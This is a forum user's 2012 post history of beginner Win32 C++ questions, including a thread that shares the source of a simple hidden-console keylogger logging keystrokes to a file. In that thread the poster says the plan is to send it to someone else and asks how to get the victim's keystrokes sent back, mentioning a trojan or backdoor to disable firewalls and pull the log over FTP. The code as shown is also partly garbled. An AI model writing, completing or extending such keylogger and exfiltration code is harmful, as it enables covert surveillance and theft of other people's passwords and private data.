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Messages - Pachelbel

Pages: [1]
C - C++ / Re: [C++]KeyLogger(simple help)
« on: May 13, 2012, 03:39:47 am »
Alright ca0s, I'll get more info about sockets and start reading, late at night I'll be probably coding the sockets. Thank you very much for your suggestion and it's cool to find some people here that speak Spanish , gracias y adios!

C - C++ / Re: [C++]KeyLogger(simple help)
« on: May 13, 2012, 02:24:20 am »
Could be possible to add the library "winsock.h" to this little program and start programming a client-service code to share information betwen one computer and another??? and i was wondering if there are functions in C++ to get IP adress and ports , because that's what i need define the socket right? Local and remote IP and some ports.

C - C++ / Re: [C++]KeyLogger(simple help)
« on: May 11, 2012, 04:56:56 am »
Hola AB2050,
yo tambien soy nuevo en este foro y hace unos meses empeze a estudiar el lenguaje de programacion que yo eleji para empezar, en mi caso C++, como veras hize este simple keyloger y necesitaba algo de ayuda para unas cosillas, pero lo que me dices de usarlo sin un compiler no tiene sentido para mi, el keylogger lo he probado y funciona hasta el momento cada linea de codigo escrita. Saludos!

C - C++ / Re: [C++]KeyLogger(simple help)
« on: May 04, 2012, 05:37:24 pm »
After reading more about FTP i realized that it could be possible but i will need to code another program, a trojan or a something like a backdoor so i can access and control victim computer remotly and enable the port 21 and disable firewalls so i can transfer the for example log.txt file to my computer so i can get all the information inside. @Kulverstukas , thanks for the suggestion.

C - C++ / Re: [C++]KeyLogger(simple help)
« on: May 04, 2012, 02:23:34 am »
FTP? so i have to transfer the file from his computer to mine via this TCP thing... Can you explain me more about it??? I'm actually a newbie but learning fast, How do i include the file transfer protocol to my code?? or it doens't work that way?? any explanation would be really usefull , Thanks!

Forget about the explanation, i just read the FTP definition and how it works , i will use any FTP client web based to transfer the .txt file with the information inside, Thank you very much for the FTP suggestion, i joined this community some days ago iam a newbie but i cant believe all the things about programming and network iam learning , every single sec i learn something new and i already have a base in C++, as you can see iam working with Win APIs right now :) , Thank you very much.

EDIT your posts next time bro :)

C - C++ / Re: [C++]KeyLogger(simple help)
« on: May 04, 2012, 01:55:53 am »
Sorry for my bad English it isnt my main language, what i was trying to say is that when i compile and run the keylogger in my computer, this creates a log.txt file where the keys are stored, if i send this to someone will do the same in his computer but i cant access to that file because then i would have to get into his computer, i want to know if there is any kind of code that send the keys to a file BUT in my computer from another one.

C - C++ / [C++]KeyLogger(simple help)
« on: May 04, 2012, 01:19:07 am »
Hi guys, well after reading more about Win APIs i decided to learn how a simple keylogger work and i learned the function of every line in the code that i wrote. The simple keylogger that i wrote is in C++ and i did it in CodeBlocks, i compiled it and it works fine.But i got a problem.... the keylogger works and creates a log.txt file in C:\\ where the keys will be stored. That's cool yeah, but i want to send it to someone for example and it will create this log.txt file in his computer so i cant see the things inside the file. I want your help guys to add some code so it creates somekind of file in my computer where the keys would be sent so i can check all the info inside.

here is the code:
Code: (cpp) [Select]
// KeyLogger por Lucas.... MixMix0305 !!!!!!!

#include <iostream>
#include <windows.h>
#include <fstream>

using namespace std;

int main()
    //Variable que determinara cuando cerrar el keylogger...
    bool aprete = true;

    //Creamos y abrimos el fichero txt para escribir en el...
    ofstream log;"C:\\log.txt", ofstream::out);

    //SI ocurre algun error con el archivo
        cout << "Error al abrir archivo log.txt en directorio raiz" << endl;

    //Ocultamos la ventanita (consola)
    HWND ocultar = FindWindow("ConsoleWindowClass",NULL);

    //Inicia el ciclo
        //Cuando se apriete una de las teclas, escribimos en el archivo de texto la tecla pulsada...
        if (GetAsyncKeyState(VK_SPACE) == -32767){
        log << " ";
        if (GetAsyncKeyState('A') == -32767){
        log << "A";
        if (GetAsyncKeyState('B') == -32767){
        log << "B";
        if (GetAsyncKeyState('C') == -32767){
        log << "C";
        if (GetAsyncKeyState('D') == -32767){
        log << "D";
        if (GetAsyncKeyState('E') == -32767){
        log << "E";
        if (GetAsyncKeyState('F') == -32767){
        log << "F";
        if (GetAsyncKeyState('G') == -32767){
        log << "G";
        if (GetAsyncKeyState('H') == -32767){
        log << "H";
        if (GetAsyncKeyState('I') == -32767){
        log << "I";
        if (GetAsyncKeyState('J') == -32767){
        log << "J";
        if (GetAsyncKeyState('K') == -32767){
        log << "K";
        if (GetAsyncKeyState('L') == -32767){
        log << "L";
        if (GetAsyncKeyState('M') == -32767){
        log << "M";
        if (GetAsyncKeyState('N') == -32767){
        log << "N";
        if (GetAsyncKeyState(VK_CAPITAL) == -32767){
        log << " Mayus-";
        if (GetAsyncKeyState(VK_BACK) == -32767){
        log << " BACKSPACE ";
        if (GetAsyncKeyState('O') == -32767){
        log << "O";
        if (GetAsyncKeyState('P') == -32767){
        log << "P";
        if (GetAsyncKeyState('Q') == -32767){
        log << "Q";
        if (GetAsyncKeyState('R') == -32767){
        log << "R";
        if (GetAsyncKeyState('S') == -32767){
        log << "S";
        if (GetAsyncKeyState('T') == -32767){
        log << "T";
        if (GetAsyncKeyState('U') == -32767){
        log << "U";
        if (GetAsyncKeyState('V') == -32767){
        log << "V";
        if (GetAsyncKeyState('W') == -32767){
        log << "W";
        if (GetAsyncKeyState('X') == -32767){
        log << "X";
        if (GetAsyncKeyState('Y') == -32767){
        log << "Y";
        if (GetAsyncKeyState('Z') == -32767){
        log << "Z";
        if (GetAsyncKeyState(VK_RETURN) == -32767){
        log << endl;
        if (GetAsyncKeyState('1') == -32767){
        log << "1";
        if (GetAsyncKeyState('2') == -32767){
        log << "2";
        if (GetAsyncKeyState('3') == -32767){
        log << "3";
        if (GetAsyncKeyState('4') == -32767){
        log << "4";
        if (GetAsyncKeyState('5') == -32767){
        log << "5";
        if (GetAsyncKeyState('6') == -32767){
        log << "6";
        if (GetAsyncKeyState('7') == -32767){
        log << "7";
        if (GetAsyncKeyState('8') == -32767){
        log << "8";
        if (GetAsyncKeyState('9') == -32767){
        log << "9";
        if (GetAsyncKeyState(0) == -32767){
        log << "0";
        if (GetAsyncKeyState(VK_LSHIFT) == -32767){
        log << " SHIFT-";
        if (GetAsyncKeyState(VK_MENU) == -32767){
        log << " ALT-";
        if (GetAsyncKeyState(VK_F7) == -32767){
        ShowWindow(ocultar,1); // Si aprietan F7 se detiene el keylogger...
        aprete = false;

    //Cerramos el archivo log.txt

    //Una boludes para salir del programa..........
    //cout << "----------------------------------" << endl << "ARCHIVO log.txt CREADO CON EXITO!" << endl;


Please use the CODE tags, as well as the advanced tags code=cpp in brackets []

C - C++ / Re: C++ Win32 APIS,HELP TUTORIAL!
« on: May 02, 2012, 11:21:15 pm »
Yes it helps @petermlm Thank you very much and also by just reading stuffs like this i found a really complete tutorial with all the functions
in Win32 APis, the problem is that is in Spanish, for me its cool because i know spanish but it could be really usefull for people who know this language :D , iam reading it while posting this and i got an erection haha  ;D , it's time to start programming 8) .

Here is the link: <------------- Win APIs tutorial.

by making some questions to my self i found what i wanted, hope that this helps to more people in the forum, Bye and thanks.

« on: May 02, 2012, 11:05:38 pm »
Hello again guys, as you may already know i have been studying C++ language.I already know all the basics,i jumped to Win32 APis
but after googling alot i couldnt find any good tutorial or list of this APIS. I would like to know if there is any kind of list or tutorial that shows
all the Win32 APIs and their function in C++. If anyone got a list or tutorial of all the Win32 Apis please send it to me, Thanks!

C - C++ / Re: Noob,Problem with Win32Api
« on: May 01, 2012, 10:32:01 pm »
I wasn´t looking at that website, but this will really help... found what i needed , Thank you very much Deque! :)

C - C++ / Re: Noob,Problem with Win32Api
« on: May 01, 2012, 10:06:46 pm »
So what you are trying to say is that i need to declare it like a prototype under the library????

C - C++ / Noob,Problem with Win32Api
« on: May 01, 2012, 09:38:43 pm »
Hello I'm Pachelbel, first of all i wanna say that iam a Newb but i wont be crying like many other people that i saw in this posts. I started learning C++, and i wanted to go for Win32 Api.... now there is a problem and i need your help... i was writting this basic Win32 code and when i try to compile it i get this error: ('WindowProcedure' was not declared in this scope) --- line 11. Here is the code:
Code: [Select]
#include <windows.h>
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpszCmdParam, int nCmdShow)
    HWND hWnd;
    MSG Message;
    WndClass.lpfnWndProc = WindowProcedure;
    WndClass.cbClsExtra = 0;
    WndClass.cbWndExtra = 0;
    WndClass.hbrBackground = (HBRUSH) GetStockObject(LTGRAY_BRUSH);
    WndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
    WndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
    WndClass.hInstance = hInstance;
    WndClass.lpszClassName = "NUESTRA_CLASE";
    WndClass.lpszMenuName = NULL;
    hWnd = CreateWindow(
     "Ventana de Ejemplo",
     ShowWindow(hWnd, SW_SHOWDEFAULT);
     while(TRUE == GetMessage(&Message, 0, 0, 0))
     return Message.wParam;
What should i correct ???. Anyways thanks and sorry for my english, it isnt my mother tonge :P . Win32 API's Tutorials would be really helpfull!

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